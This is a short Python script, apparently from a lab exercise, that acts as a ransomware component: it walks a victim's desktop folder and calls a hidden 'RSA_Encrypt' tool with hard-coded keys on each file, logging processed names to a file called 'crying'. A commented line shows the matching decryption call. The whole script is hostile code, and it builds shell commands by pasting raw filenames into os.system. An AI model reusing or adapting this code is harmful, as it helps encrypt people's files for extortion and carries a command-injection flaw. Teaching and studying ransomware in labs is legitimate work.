#!/usr/bin/env python

import os

def Encrypt():
    files = os.listdir('/home/victim/Desktop/attackDesktop')
    encrypted = ''
    try:
        f = open("/home/victim/Documents/crying",'r+')
        encrypted = f.read()
    except FileNotFoundError:
        f = open("/home/victim/Documents/crying",'w')
    for file in files:
        if file not in encrypted:
            os.system("/home/victim/Downloads/task2/.EndlessTears/RSA_Encrypt -C 126419 30743 /home/victim/Desktop/attackDesktop/" + file)
            #os.system("/home/victim/Downloads/task2/.EndlessTears/RSA_Encrypt -D 126419 55439 /home/victim/Desktop/attackDesktop/" + file)
            f.write(file + '\n')
    f.close()
def main():
    Encrypt()



if __name__ == '__main__':
    main()
